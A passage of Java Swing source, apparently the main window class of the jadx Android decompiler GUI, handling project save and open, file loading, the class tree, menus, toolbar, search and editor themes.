private void saveProject() {
if (!project.isSaveFileSelected()) {
saveProjectAs();
} else {
project.save();
update();
}
}
private void saveProjectAs() {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.SAVE_PROJECT);
if (project.getFilePaths().size() == 1) {
// If there is only one file loaded we suggest saving the jadx project file next to the loaded file
Path projectPath = getProjectPathForFile(this.project.getFilePaths().get(0));
fileDialog.setSelectedFile(projectPath);
}
List<Path> saveFiles = fileDialog.show();
if (saveFiles.isEmpty()) {
return;
}
settings.setLastSaveProjectPath(fileDialog.getCurrentDir());
Path savePath = saveFiles.get(0);
if (!savePath.getFileName().toString().toLowerCase(Locale.ROOT).endsWith(JadxProject.PROJECT_EXTENSION)) {
savePath = savePath.resolveSibling(savePath.getFileName() + "." + JadxProject.PROJECT_EXTENSION);
}
if (Files.exists(savePath)) {
int res = JOptionPane.showConfirmDialog(
this,
NLS.str("confirm.save_as_message", savePath.getFileName()),
NLS.str("confirm.save_as_title"),
JOptionPane.YES_NO_OPTION);
if (res == JOptionPane.NO_OPTION) {
return;
}
}
project.saveAs(savePath);
settings.addRecentProject(savePath);
update();
}
public void addNewScript() {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.CUSTOM_SAVE);
fileDialog.setTitle(NLS.str("file.save"));
Path workingDir = project.getWorkingDir();
Path baseDir = workingDir != null ? workingDir : settings.getLastSaveFilePath();
fileDialog.setSelectedFile(baseDir.resolve("script.jadx.kts"));
fileDialog.setFileExtList(Collections.singletonList("jadx.kts"));
fileDialog.setSelectionMode(JFileChooser.FILES_ONLY);
List<Path> paths = fileDialog.show();
if (paths.size() != 1) {
return;
}
Path scriptFile = paths.get(0);
try {
TemplateFile tmpl = TemplateFile.fromResources("/files/script.jadx.kts.tmpl");
FileUtils.writeFile(scriptFile, tmpl.build());
} catch (Exception e) {
LOG.error("Failed to save new script file: {}", scriptFile, e);
}
List<Path> inputs = project.getFilePaths();
inputs.add(scriptFile);
project.setFilePaths(inputs);
project.save();
reopen();
}
public void removeInput(Path file) {
List<Path> inputs = project.getFilePaths();
inputs.remove(file);
project.setFilePaths(inputs);
project.save();
reopen();
}
public void open(Path path) {
open(Collections.singletonList(path), EMPTY_RUNNABLE);
}
public void open(List<Path> paths) {
open(paths, EMPTY_RUNNABLE);
}
private void open(List<Path> paths, Runnable onFinish) {
saveAll();
closeAll();
if (paths.size() == 1 && openSingleFile(paths.get(0), onFinish)) {
return;
}
// start new project
project = new JadxProject(this);
project.setFilePaths(paths);
loadFiles(onFinish);
}
private boolean openSingleFile(Path singleFile, Runnable onFinish) {
if (singleFile.getFileName() == null) {
return false;
}
String fileExtension = CommonFileUtils.getFileExtension(singleFile.getFileName().toString());
if (fileExtension != null && fileExtension.equalsIgnoreCase(JadxProject.PROJECT_EXTENSION)) {
openProject(singleFile, onFinish);
return true;
}
// check if project file already saved with default name
Path projectPath = getProjectPathForFile(singleFile);
if (Files.exists(projectPath)) {
openProject(projectPath, onFinish);
return true;
}
return false;
}
private static Path getProjectPathForFile(Path loadedFile) {
String fileName = loadedFile.getFileName() + "." + JadxProject.PROJECT_EXTENSION;
return loadedFile.resolveSibling(fileName);
}
public void reopen() {
synchronized (ReloadProject.EVENT) {
saveAll();
closeAll();
loadFiles(EMPTY_RUNNABLE);
menuBar.reloadShortcuts();
}
}
private void openProject(Path path, Runnable onFinish) {
LOG.debug("Loading project: {}", path);
JadxProject jadxProject = JadxProject.load(this, path);
if (jadxProject == null) {
JOptionPane.showMessageDialog(
this,
NLS.str("msg.project_error"),
NLS.str("msg.project_error_title"),
JOptionPane.INFORMATION_MESSAGE);
jadxProject = new JadxProject(this);
}
settings.addRecentProject(path);
project = jadxProject;
loadFiles(onFinish);
}
private void loadFiles(Runnable onFinish) {
if (project.getFilePaths().isEmpty()) {
tabbedPane.showNode(new StartPageNode());
return;
}
AtomicReference<Exception> wrapperException = new AtomicReference<>();
backgroundExecutor.execute(NLS.str("progress.load"),
() -> {
try {
wrapper.open();
} catch (Exception e) {
wrapperException.set(e);
}
},
status -> {
if (wrapperException.get() != null) {
closeAll();
Exception e = wrapperException.get();
if (e instanceof RuntimeException) {
throw (RuntimeException) e;
} else {
throw new JadxRuntimeException("Project load error", e);
}
}
if (status == TaskStatus.CANCEL_BY_MEMORY) {
showHeapUsageBar();
UiUtils.errorMessage(this, NLS.str("message.memoryLow"));
return;
}
if (status != TaskStatus.COMPLETE) {
LOG.warn("Loading task incomplete, status: {}", status);
return;
}
checkLoadedStatus();
onOpen();
onFinish.run();
});
}
private void saveAll() {
saveOpenTabs();
BreakpointManager.saveAndExit();
}
private void closeAll() {
notifyLoadListeners(false);
cancelBackgroundJobs();
clearTree();
resetCache();
LogCollector.getInstance().reset();
wrapper.close();
tabbedPane.closeAllTabs();
UiUtils.resetClipboardOwner();
System.gc();
update();
}
private void checkLoadedStatus() {
if (!wrapper.getClasses().isEmpty()) {
return;
}
int errors = issuesPanel.getErrorsCount();
if (errors > 0) {
int result = JOptionPane.showConfirmDialog(this,
NLS.str("message.load_errors", errors),
NLS.str("message.errorTitle"),
JOptionPane.OK_CANCEL_OPTION,
JOptionPane.ERROR_MESSAGE);
if (result == JOptionPane.OK_OPTION) {
showLogViewer(LogOptions.allWithLevel(Level.ERROR));
}
} else {
UiUtils.showMessageBox(this, NLS.str("message.no_classes"));
}
}
private void onOpen() {
initTree();
updateLiveReload(project.isEnableLiveReload());
BreakpointManager.init(project.getFilePaths().get(0).toAbsolutePath().getParent());
initEvents();
List<EditorViewState> openTabs = project.getOpenTabs(this);
backgroundExecutor.execute(NLS.str("progress.load"),
() -> preLoadOpenTabs(openTabs),
status -> {
restoreOpenTabs(openTabs);
runInitialBackgroundJobs();
notifyLoadListeners(true);
update();
});
}
public void passesReloaded() {
initEvents(); // TODO: events reset on reload passes on script run
tabbedPane.reloadInactiveTabs();
reloadTree();
}
private void initEvents() {
events().addListener(JadxEvents.RELOAD_PROJECT, ev -> UiUtils.uiRun(this::reopen));
RenameService.init(this);
}
public void updateLiveReload(boolean state) {
if (liveReloadWorker.isStarted() == state) {
return;
}
project.setEnableLiveReload(state);
liveReloadMenuItem.setEnabled(false);
backgroundExecutor.execute(
(state ? "Starting" : "Stopping") + " live reload",
() -> liveReloadWorker.updateState(state),
s -> {
liveReloadMenuItem.setState(state);
liveReloadMenuItem.setEnabled(true);
});
}
private void addTreeCustomNodes() {
treeRoot.replaceCustomNode(ApkSignature.getApkSignature(wrapper));
treeRoot.replaceCustomNode(new SummaryNode(this));
}
private boolean ensureProjectIsSaved() {
if (!project.isSaved() && !project.isInitial()) {
// Check if we saved settings that indicate what to do
if (settings.getSaveOption() == JadxSettings.SAVEOPTION.NEVER) {
return true;
}
if (settings.getSaveOption() == JadxSettings.SAVEOPTION.ALWAYS) {
saveProject();
return true;
}
JCheckBox remember = new JCheckBox(NLS.str("confirm.remember"));
JLabel message = new JLabel(NLS.str("confirm.not_saved_message"));
JPanel inner = new JPanel(new BorderLayout());
inner.add(remember, BorderLayout.SOUTH);
inner.add(message, BorderLayout.NORTH);
int res = JOptionPane.showConfirmDialog(
this,
inner,
NLS.str("confirm.not_saved_title"),
JOptionPane.YES_NO_CANCEL_OPTION);
if (res == JOptionPane.CANCEL_OPTION) {
return false;
}
if (res == JOptionPane.YES_OPTION) {
if (remember.isSelected()) {
settings.setSaveOption(JadxSettings.SAVEOPTION.ALWAYS);
settings.sync();
}
saveProject();
} else if (res == JOptionPane.NO_OPTION) {
if (remember.isSelected()) {
settings.setSaveOption(JadxSettings.SAVEOPTION.NEVER);
settings.sync();
}
}
}
return true;
}
public void updateProject(@NotNull JadxProject jadxProject) {
this.project = jadxProject;
UiUtils.uiRun(this::update);
}
public void update() {
UiUtils.uiThreadGuard();
newProjectAction.setEnabled(!project.isInitial());
saveProjectAction.setEnabled(loaded && !project.isSaved());
deobfToggleBtn.setSelected(settings.isDeobfuscationOn());
renameMappings.onUpdate(loaded);
Path projectPath = project.getProjectPath();
String pathString;
if (projectPath == null) {
pathString = "";
} else {
pathString = " [" + projectPath.toAbsolutePath().getParent() + ']';
}
setTitle((project.isSaved() ? "" : '*')
+ project.getName() + pathString + " - " + DEFAULT_TITLE);
}
protected void resetCache() {
cacheObject.reset();
}
synchronized void runInitialBackgroundJobs() {
if (settings.isAutoStartJobs()) {
new Timer().schedule(new TimerTask() {
@Override
public void run() {
requestFullDecompilation();
}
}, 1000);
}
}
public void requestFullDecompilation() {
if (cacheObject.isFullDecompilationFinished()) {
return;
}
backgroundExecutor.execute(new DecompileTask(this));
}
public void resetCodeCache() {
backgroundExecutor.execute(
NLS.str("preferences.cache.task.delete"),
() -> {
try {
getWrapper().getCurrentDecompiler().ifPresent(jadx -> {
try {
jadx.getArgs().getCodeCache().close();
} catch (Exception e) {
LOG.error("Failed to close code cache", e);
}
});
Path cacheDir = project.getCacheDir();
project.resetCacheDir();
FileUtils.deleteDirIfExists(cacheDir);
} catch (Exception e) {
LOG.error("Error during code cache reset", e);
}
},
status -> events().send(ReloadProject.EVENT));
}
public void cancelBackgroundJobs() {
backgroundExecutor.cancelAll();
}
private void saveAll(boolean export) {
FileDialogWrapper fileDialog = new FileDialogWrapper(this, FileOpenMode.EXPORT);
List<Path> saveDirs = fileDialog.show();
if (saveDirs.isEmpty()) {
return;
}
JadxArgs decompilerArgs = wrapper.getArgs();
decompilerArgs.setExportAsGradleProject(export);
if (export) {
decompilerArgs.setSkipSources(false);
decompilerArgs.setSkipResources(false);
} else {
decompilerArgs.setSkipSources(settings.isSkipSources());
decompilerArgs.setSkipResources(settings.isSkipResources());
}
settings.setLastSaveFilePath(fileDialog.getCurrentDir());
backgroundExecutor.execute(new ExportTask(this, wrapper, saveDirs.get(0).toFile()));
}
public void initTree() {
treeRoot = new JRoot(wrapper);
treeRoot.setFlatPackages(isFlattenPackage);
treeModel.setRoot(treeRoot);
addTreeCustomNodes();
treeRoot.update();
reloadTree();
}
private void clearTree() {
tabbedPane.reset();
treeRoot = null;
treeModel.setRoot(null);
treeModel.reload();
}
public void reloadTree() {
treeReloading = true;
treeUpdateListener.forEach(listener -> listener.accept(treeRoot));
treeModel.reload();
List<String[]> treeExpansions = project.getTreeExpansions();
if (!treeExpansions.isEmpty()) {
expand(treeRoot, treeExpansions);
} else {
tree.expandRow(1);
}
treeReloading = false;
}
public void rebuildPackagesTree() {
cacheObject.setPackageHelper(null);
treeRoot.update();
}
private void expand(TreeNode node, List<String[]> treeExpansions) {
TreeNode[] pathNodes = treeModel.getPathToRoot(node);
if (pathNodes == null) {
return;
}
TreePath path = new TreePath(pathNodes);
for (String[] expansion : treeExpansions) {
if (Arrays.equals(expansion, getPathExpansion(path))) {
tree.expandPath(path);
break;
}
}
for (int i = node.getChildCount() - 1; i >= 0; i--) {
expand(node.getChildAt(i), treeExpansions);
}
}
private void toggleFlattenPackage() {
setFlattenPackage(!isFlattenPackage);
}
private void setFlattenPackage(boolean value) {
isFlattenPackage = value;
settings.setFlattenPackage(isFlattenPackage);
flatPkgButton.setSelected(isFlattenPackage);
flatPkgMenuItem.setState(isFlattenPackage);
Object root = treeModel.getRoot();
if (root instanceof JRoot) {
JRoot treeRoot = (JRoot) root;
treeRoot.setFlatPackages(isFlattenPackage);
reloadTree();
}
}
private void toggleDeobfuscation() {
boolean deobfOn = !settings.isDeobfuscationOn();
settings.setDeobfuscationOn(deobfOn);
settings.sync();
deobfToggleBtn.setSelected(deobfOn);
deobfMenuItem.setState(deobfOn);
reopen();
}
private boolean nodeClickAction(@Nullable Object obj) {
if (obj == null) {
return false;
}
try {
if (obj instanceof JResource) {
JResource res = (JResource) obj;
ResourceFile resFile = res.getResFile();
if (resFile != null && JResource.isSupportedForView(resFile.getType())) {
return tabbedPane.showNode(res);
}
} else if (obj instanceof JNode) {
JNode node = (JNode) obj;
if (node.getRootClass() != null) {
tabbedPane.codeJump(node);
return true;
}
return tabbedPane.showNode(node);
}
} catch (Exception e) {
LOG.error("Content loading error", e);
}
return false;
}
private void treeRightClickAction(MouseEvent e) {
JNode node = getJNodeUnderMouse(e);
if (node == null) {
return;
}
JPopupMenu menu = node.onTreePopupMenu(this);
if (menu != null) {
menu.show(e.getComponent(), e.getX(), e.getY());
}
}
@Nullable
private JNode getJNodeUnderMouse(MouseEvent mouseEvent) {
TreePath path = tree.getClosestPathForLocation(mouseEvent.getX(), mouseEvent.getY());
if (path == null) {
return null;
}
// allow 'closest' path only at the right of the item row
Rectangle pathBounds = tree.getPathBounds(path);
if (pathBounds != null) {
int y = mouseEvent.getY();
if (y < pathBounds.y || y > (pathBounds.y + pathBounds.height)) {
return null;
}
if (mouseEvent.getX() < pathBounds.x) {
// exclude expand/collapse events
return null;
}
}
Object obj = path.getLastPathComponent();
if (obj instanceof JNode) {
tree.setSelectionPath(path);
return (JNode) obj;
}
return null;
}
public void syncWithEditor() {
ContentPanel selectedContentPanel = tabbedPane.getSelectedContentPanel();
if (selectedContentPanel == null) {
return;
}
JNode node = selectedContentPanel.getNode();
if (node.getParent() == null && treeRoot != null) {
// node not register in tree
node = treeRoot.searchNode(node);
if (node == null) {
LOG.error("Class not found in tree");
return;
}
}
TreeNode[] pathNodes = treeModel.getPathToRoot(node);
if (pathNodes == null) {
return;
}
TreePath path = new TreePath(pathNodes);
tree.setSelectionPath(path);
tree.makeVisible(path);
tree.scrollPathToVisible(path);
tree.requestFocus();
}
public void textSearch() {
ContentPanel panel = tabbedPane.getSelectedContentPanel();
if (panel instanceof AbstractCodeContentPanel) {
AbstractCodeArea codeArea = ((AbstractCodeContentPanel) panel).getCodeArea();
String preferText = codeArea.getSelectedText();
if (StringUtils.isEmpty(preferText)) {
preferText = codeArea.getWordUnderCaret();
}
if (!StringUtils.isEmpty(preferText)) {
SearchDialog.searchText(MainWindow.this, preferText);
return;
}
}
SearchDialog.search(MainWindow.this, SearchDialog.SearchPreset.TEXT);
}
public void gotoMainActivity() {
AndroidManifestParser parser = new AndroidManifestParser(
AndroidManifestParser.getAndroidManifest(getWrapper().getResources()),
EnumSet.of(AppAttribute.MAIN_ACTIVITY));
if (!parser.isManifestFound()) {
JOptionPane.showMessageDialog(MainWindow.this,
NLS.str("error_dialog.not_found", "AndroidManifest.xml"),
NLS.str("error_dialog.title"),
JOptionPane.ERROR_MESSAGE);
return;
}
try {
ApplicationParams results = parser.parse();
if (results.getMainActivityName() == null) {
throw new JadxRuntimeException("Failed to get main activity name from manifest");
}
JavaClass mainActivityClass = results.getMainActivity(getWrapper().getDecompiler());
if (mainActivityClass == null) {
throw new JadxRuntimeException("Failed to find main activity class: " + results.getMainActivityName());
}
tabbedPane.codeJump(getCacheObject().getNodeCache().makeFrom(mainActivityClass));
} catch (Exception e) {
LOG.error("Main activity not found", e);
JOptionPane.showMessageDialog(MainWindow.this,
NLS.str("error_dialog.not_found", "Main Activity"),
NLS.str("error_dialog.title"),
JOptionPane.ERROR_MESSAGE);
}
}
private void initMenuAndToolbar() {
JadxGuiAction openAction = new JadxGuiAction(ActionModel.OPEN, this::openFileDialog);
JadxGuiAction openProject = new JadxGuiAction(ActionModel.OPEN_PROJECT, this::openProjectDialog);
JadxGuiAction addFilesAction = new JadxGuiAction(ActionModel.ADD_FILES, () -> addFiles());
newProjectAction = new JadxGuiAction(ActionModel.NEW_PROJECT, this::newProject);
saveProjectAction = new JadxGuiAction(ActionModel.SAVE_PROJECT, this::saveProject);
JadxGuiAction saveProjectAsAction = new JadxGuiAction(ActionModel.SAVE_PROJECT_AS, this::saveProjectAs);
JadxGuiAction reloadAction = new JadxGuiAction(ActionModel.RELOAD, () -> UiUtils.uiRun(this::reopen));
JadxGuiAction liveReloadAction = new JadxGuiAction(ActionModel.LIVE_RELOAD,
() -> updateLiveReload(!project.isEnableLiveReload()));
liveReloadMenuItem = new JCheckBoxMenuItem(liveReloadAction);
liveReloadMenuItem.setState(project.isEnableLiveReload());
JadxGuiAction saveAllAction = new JadxGuiAction(ActionModel.SAVE_ALL, () -> saveAll(false));
JadxGuiAction exportAction = new JadxGuiAction(ActionModel.EXPORT, () -> saveAll(true));
JMenu recentProjects = new JadxMenu(NLS.str("menu.recent_projects"), shortcutsController);
recentProjects.addMenuListener(new RecentProjectsMenuListener(this, recentProjects));
JadxGuiAction prefsAction = new JadxGuiAction(ActionModel.PREFS, this::openSettings);
JadxGuiAction exitAction = new JadxGuiAction(ActionModel.EXIT, this::closeWindow);
isFlattenPackage = settings.isFlattenPackage();
flatPkgMenuItem = new JCheckBoxMenuItem(NLS.str("menu.flatten"), ICON_FLAT_PKG);
flatPkgMenuItem.setState(isFlattenPackage);
JCheckBoxMenuItem heapUsageBarMenuItem = new JCheckBoxMenuItem(NLS.str("menu.heapUsageBar"));
heapUsageBarMenuItem.setState(settings.isShowHeapUsageBar());
heapUsageBarMenuItem.addActionListener(event -> {
settings.setShowHeapUsageBar(!settings.isShowHeapUsageBar());
heapUsageBar.setVisible(settings.isShowHeapUsageBar());
});
JCheckBoxMenuItem alwaysSelectOpened = new JCheckBoxMenuItem(NLS.str("menu.alwaysSelectOpened"));
alwaysSelectOpened.setState(settings.isAlwaysSelectOpened());
alwaysSelectOpened.addActionListener(event -> {
settings.setAlwaysSelectOpened(!settings.isAlwaysSelectOpened());
if (settings.isAlwaysSelectOpened()) {
this.syncWithEditor();
}
});
JCheckBoxMenuItem dockLog = new JCheckBoxMenuItem(NLS.str("menu.dock_log"));
dockLog.setState(settings.isDockLogViewer());
dockLog.addActionListener(event -> settings.setDockLogViewer(!settings.isDockLogViewer()));
JadxGuiAction syncAction = new JadxGuiAction(ActionModel.SYNC, this::syncWithEditor);
JadxGuiAction textSearchAction = new JadxGuiAction(ActionModel.TEXT_SEARCH, this::textSearch);
JadxGuiAction clsSearchAction = new JadxGuiAction(ActionModel.CLASS_SEARCH,
() -> SearchDialog.search(MainWindow.this, SearchDialog.SearchPreset.CLASS));
JadxGuiAction commentSearchAction = new JadxGuiAction(ActionModel.COMMENT_SEARCH,
() -> SearchDialog.search(MainWindow.this, SearchDialog.SearchPreset.COMMENT));
JadxGuiAction gotoMainActivityAction = new JadxGuiAction(ActionModel.GOTO_MAIN_ACTIVITY,
this::gotoMainActivity);
JadxGuiAction decompileAllAction = new JadxGuiAction(ActionModel.DECOMPILE_ALL, this::requestFullDecompilation);
JadxGuiAction resetCacheAction = new JadxGuiAction(ActionModel.RESET_CACHE, this::resetCodeCache);
JadxGuiAction deobfAction = new JadxGuiAction(ActionModel.DEOBF, this::toggleDeobfuscation);
deobfToggleBtn = new JToggleButton(deobfAction);
deobfToggleBtn.setSelected(settings.isDeobfuscationOn());
deobfToggleBtn.setText("");
deobfMenuItem = new JCheckBoxMenuItem(deobfAction);
deobfMenuItem.setState(settings.isDeobfuscationOn());
JadxGuiAction showLogAction = new JadxGuiAction(ActionModel.SHOW_LOG,
() -> showLogViewer(LogOptions.current()));
JadxGuiAction aboutAction = new JadxGuiAction(ActionModel.ABOUT, () -> new AboutDialog().setVisible(true));
JadxGuiAction backAction = new JadxGuiAction(ActionModel.BACK, tabbedPane::navBack);
JadxGuiAction backVariantAction = new JadxGuiAction(ActionModel.BACK_V, tabbedPane::navBack);
JadxGuiAction forwardAction = new JadxGuiAction(ActionModel.FORWARD, tabbedPane::navForward);
JadxGuiAction forwardVariantAction = new JadxGuiAction(ActionModel.FORWARD_V, tabbedPane::navForward);
JadxGuiAction quarkAction = new JadxGuiAction(ActionModel.QUARK,
() -> new QuarkDialog(MainWindow.this).setVisible(true));
JadxGuiAction openDeviceAction = new JadxGuiAction(ActionModel.OPEN_DEVICE,
() -> new ADBDialog(MainWindow.this).setVisible(true));
JMenu file = new JadxMenu(NLS.str("menu.file"), shortcutsController);
file.setMnemonic(KeyEvent.VK_F);
file.add(openAction);
file.add(openProject);
file.add(addFilesAction);
file.addSeparator();
file.add(newProjectAction);
file.add(saveProjectAction);
file.add(saveProjectAsAction);
file.addSeparator();
file.add(reloadAction);
file.add(liveReloadMenuItem);
renameMappings.addMenuActions(file);
file.addSeparator();
file.add(saveAllAction);
file.add(exportAction);
file.addSeparator();
file.add(recentProjects);
file.addSeparator();
file.add(prefsAction);
file.addSeparator();
file.add(exitAction);
JMenu view = new JadxMenu(NLS.str("menu.view"), shortcutsController);
view.setMnemonic(KeyEvent.VK_V);
view.add(flatPkgMenuItem);
view.add(syncAction);
view.add(heapUsageBarMenuItem);
view.add(alwaysSelectOpened);
view.add(dockLog);
JMenu nav = new JadxMenu(NLS.str("menu.navigation"), shortcutsController);
nav.setMnemonic(KeyEvent.VK_N);
nav.add(textSearchAction);
nav.add(clsSearchAction);
nav.add(commentSearchAction);
nav.add(gotoMainActivityAction);
nav.addSeparator();
nav.add(backAction);
nav.add(forwardAction);
pluginsMenu = new JadxMenu(NLS.str("menu.plugins"), shortcutsController);
pluginsMenu.setMnemonic(KeyEvent.VK_P);
resetPluginsMenu();
JMenu tools = new JadxMenu(NLS.str("menu.tools"), shortcutsController);
tools.setMnemonic(KeyEvent.VK_T);
tools.add(decompileAllAction);
tools.add(resetCacheAction);
tools.add(deobfMenuItem);
tools.add(quarkAction);
tools.add(openDeviceAction);
JMenu help = new JadxMenu(NLS.str("menu.help"), shortcutsController);
help.setMnemonic(KeyEvent.VK_H);
help.add(showLogAction);
if (Jadx.isDevVersion()) {
help.add(new AbstractAction("Show sample error report") {
@Override
public void actionPerformed(ActionEvent e) {
ExceptionDialog.throwTestException();
}
});
}
help.add(aboutAction);
menuBar = new JadxMenuBar();
menuBar.add(file);
menuBar.add(view);
menuBar.add(nav);
menuBar.add(tools);
menuBar.add(pluginsMenu);
menuBar.add(help);
setJMenuBar(menuBar);
flatPkgButton = new JToggleButton(ICON_FLAT_PKG);
flatPkgButton.setSelected(isFlattenPackage);
ActionListener flatPkgAction = e -> toggleFlattenPackage();
flatPkgMenuItem.addActionListener(flatPkgAction);
flatPkgButton.addActionListener(flatPkgAction);
flatPkgButton.setToolTipText(NLS.str("menu.flatten"));
updateLink = new Link("", JadxUpdate.JADX_RELEASES_URL);
updateLink.setVisible(false);
JToolBar toolbar = new JToolBar();
toolbar.setFloatable(false);
toolbar.add(openAction);
toolbar.add(addFilesAction);
toolbar.addSeparator();
toolbar.add(reloadAction);
toolbar.addSeparator();
toolbar.add(saveAllAction);
toolbar.add(exportAction);
toolbar.addSeparator();
toolbar.add(syncAction);
toolbar.add(flatPkgButton);
toolbar.addSeparator();
toolbar.add(textSearchAction);
toolbar.add(clsSearchAction);
toolbar.add(commentSearchAction);
toolbar.add(gotoMainActivityAction);
toolbar.addSeparator();
toolbar.add(backAction);
toolbar.add(forwardAction);
toolbar.addSeparator();
toolbar.add(deobfToggleBtn);
toolbar.add(quarkAction);
toolbar.add(openDeviceAction);
toolbar.addSeparator();
toolbar.add(showLogAction);
toolbar.addSeparator();
toolbar.add(prefsAction);
toolbar.addSeparator();
toolbar.add(Box.createHorizontalGlue());
toolbar.add(updateLink);
mainPanel.add(toolbar, BorderLayout.NORTH);
nav.add(new HiddenMenuItem(backVariantAction));
nav.add(new HiddenMenuItem(forwardVariantAction));
shortcutsController.bind(backVariantAction);
shortcutsController.bind(forwardVariantAction);
addLoadListener(loaded -> {
textSearchAction.setEnabled(loaded);
clsSearchAction.setEnabled(loaded);
commentSearchAction.setEnabled(loaded);
gotoMainActivityAction.setEnabled(loaded);
backAction.setEnabled(loaded);
backVariantAction.setEnabled(loaded);
forwardAction.setEnabled(loaded);
forwardVariantAction.setEnabled(loaded);
syncAction.setEnabled(loaded);
saveAllAction.setEnabled(loaded);
exportAction.setEnabled(loaded);
saveProjectAsAction.setEnabled(loaded);
reloadAction.setEnabled(loaded);
decompileAllAction.setEnabled(loaded);
deobfAction.setEnabled(loaded);
quarkAction.setEnabled(loaded);
resetCacheAction.setEnabled(loaded);
return false;
});
}
private void initUI() {
setMinimumSize(new Dimension(200, 150));
mainPanel = new JPanel(new BorderLayout());
treeSplitPane = new JSplitPane();
treeSplitPane.setResizeWeight(SPLIT_PANE_RESIZE_WEIGHT);
mainPanel.add(treeSplitPane);
DefaultMutableTreeNode treeRootNode = new DefaultMutableTreeNode(NLS.str("msg.open_file"));
treeModel = new DefaultTreeModel(treeRootNode);
tree = new JTree(treeModel);
ToolTipManager.sharedInstance().registerComponent(tree);
tree.getSelectionModel().setSelectionMode(TreeSelectionModel.SINGLE_TREE_SELECTION);
tree.setFocusable(false);
tree.addFocusListener(new FocusAdapter() {
@Override
public void focusLost(FocusEvent e) {
tree.setFocusable(false);
}
});
tree.addMouseListener(new MouseAdapter() {
@Override
public void mousePressed(MouseEvent e) {
if (SwingUtilities.isLeftMouseButton(e)) {
if (!nodeClickAction(getJNodeUnderMouse(e))) {
// click ignored -> switch to focusable mode
tree.setFocusable(true);
tree.requestFocus();
}
} else if (SwingUtilities.isRightMouseButton(e)) {
treeRightClickAction(e);
}
}
});
tree.addKeyListener(new KeyAdapter() {
@Override
public void keyPressed(KeyEvent e) {
if (e.getKeyCode() == KeyEvent.VK_ENTER) {
nodeClickAction(tree.getLastSelectedPathComponent());
}
}
});
tree.setCellRenderer(new DefaultTreeCellRenderer() {
@Override
public Component getTreeCellRendererComponent(JTree tree,
Object value, boolean selected, boolean expanded,
boolean isLeaf, int row, boolean focused) {
Component c = super.getTreeCellRendererComponent(tree, value, selected, expanded, isLeaf, row, focused);
if (value instanceof JNode) {
JNode jNode = (JNode) value;
NodeLabel.disableHtml(this, jNode.disableHtml());
setText(jNode.makeStringHtml());
setIcon(jNode.getIcon());
setToolTipText(jNode.getTooltip());
} else {
setToolTipText(null);
}
if (value instanceof JPackage) {
setEnabled(((JPackage) value).isEnabled());
}
return c;
}
});
tree.addTreeWillExpandListener(new TreeWillExpandListener() {
@Override
public void treeWillExpand(TreeExpansionEvent event) {
TreePath path = event.getPath();
Object node = path.getLastPathComponent();
if (node instanceof JLoadableNode) {
((JLoadableNode) node).loadNode();
}
if (!treeReloading) {
project.addTreeExpansion(getPathExpansion(event.getPath()));
update();
}
}
@Override
public void treeWillCollapse(TreeExpansionEvent event) {
if (!treeReloading) {
project.removeTreeExpansion(getPathExpansion(event.getPath()));
update();
}
}
});
progressPane = new ProgressPanel(this, true);
issuesPanel = new IssuesPanel(this);
JPanel leftPane = new JPanel(new BorderLayout());
JScrollPane treeScrollPane = new JScrollPane(tree);
treeScrollPane.setMinimumSize(new Dimension(100, 150));
JPanel bottomPane = new JPanel(new BorderLayout());
bottomPane.add(issuesPanel, BorderLayout.PAGE_START);
bottomPane.add(progressPane, BorderLayout.PAGE_END);
leftPane.add(treeScrollPane, BorderLayout.CENTER);
leftPane.add(bottomPane, BorderLayout.PAGE_END);
treeSplitPane.setLeftComponent(leftPane);
tabbedPane = new TabbedPane(this);
tabbedPane.setMinimumSize(new Dimension(150, 150));
new TabDndController(tabbedPane, settings);
rightSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
rightSplitPane.setTopComponent(tabbedPane);
rightSplitPane.setResizeWeight(SPLIT_PANE_RESIZE_WEIGHT);
treeSplitPane.setRightComponent(rightSplitPane);
new DropTarget(this, DnDConstants.ACTION_COPY, new MainDropTarget(this));
heapUsageBar = new HeapUsageBar();
mainPanel.add(heapUsageBar, BorderLayout.SOUTH);
bottomSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
bottomSplitPane.setTopComponent(treeSplitPane);
bottomSplitPane.setResizeWeight(SPLIT_PANE_RESIZE_WEIGHT);
mainPanel.add(bottomSplitPane, BorderLayout.CENTER);
setContentPane(mainPanel);
setTitle(DEFAULT_TITLE);
}
private static String[] getPathExpansion(TreePath path) {
List<String> pathList = new ArrayList<>();
while (path != null) {
Object node = path.getLastPathComponent();
String name;
if (node instanceof JClass) {
name = ((JClass) node).getCls().getClassNode().getClassInfo().getFullName();
} else {
name = node.toString();
}
pathList.add(name);
path = path.getParentPath();
}
return pathList.toArray(new String[0]);
}
public static void getExpandedPaths(JTree tree, TreePath path, List<TreePath> list) {
if (tree.isExpanded(path)) {
list.add(path);
TreeNode node = (TreeNode) path.getLastPathComponent();
for (int i = node.getChildCount() - 1; i >= 0; i--) {
TreeNode n = node.getChildAt(i);
TreePath child = path.pathByAddingChild(n);
getExpandedPaths(tree, child, list);
}
}
}
public void setLocationAndPosition() {
if (settings.loadWindowPos(this)) {
return;
}
GraphicsDevice gd = GraphicsEnvironment.getLocalGraphicsEnvironment().getDefaultScreenDevice();
DisplayMode mode = gd.getDisplayMode();
AffineTransform trans = gd.getDefaultConfiguration().getDefaultTransform();
int w = (int) (mode.getWidth() / trans.getScaleX());
int h = (int) (mode.getHeight() / trans.getScaleY());
setBounds((int) (w * BORDER_RATIO), (int) (h * BORDER_RATIO),
(int) (w * WINDOW_RATIO), (int) (h * WINDOW_RATIO));
setLocationRelativeTo(null);
}
private void setEditorTheme(String editorThemePath) {
try {
URL themeUrl = getClass().getResource(editorThemePath);
if (themeUrl != null) {
try (InputStream is = themeUrl.openStream()) {
editorTheme = Theme.load(is);
return;
}
}
Path themePath = Paths.get(editorThemePath);
if (Files.isRegularFile(themePath)) {
try (InputStream is = Files.newInputStream(themePath)) {
editorTheme = Theme.load(is);
return;
}
}
} catch (Exception e) {
LOG.error("Failed to load editor theme: {}", editorThemePath, e);
}
LOG.warn("Falling back to default editor theme: {}", editorThemePath);
editorThemePath = EditorTheme.getDefaultTheme().getPath();
try (InputStream is = getClass().getResourceAsStream(editorThemePath)) {
editorTheme = Theme.load(is);
return;
} catch (Exception e) {
LOG.error("Failed to load default editor theme: {}", editorThemePath, e);
editorTheme = new Theme(new RSyntaxTextArea());
}
}
public Theme getEditorTheme() {
return editorTheme;
}
private void openSettings() {
settingsOpen = true;
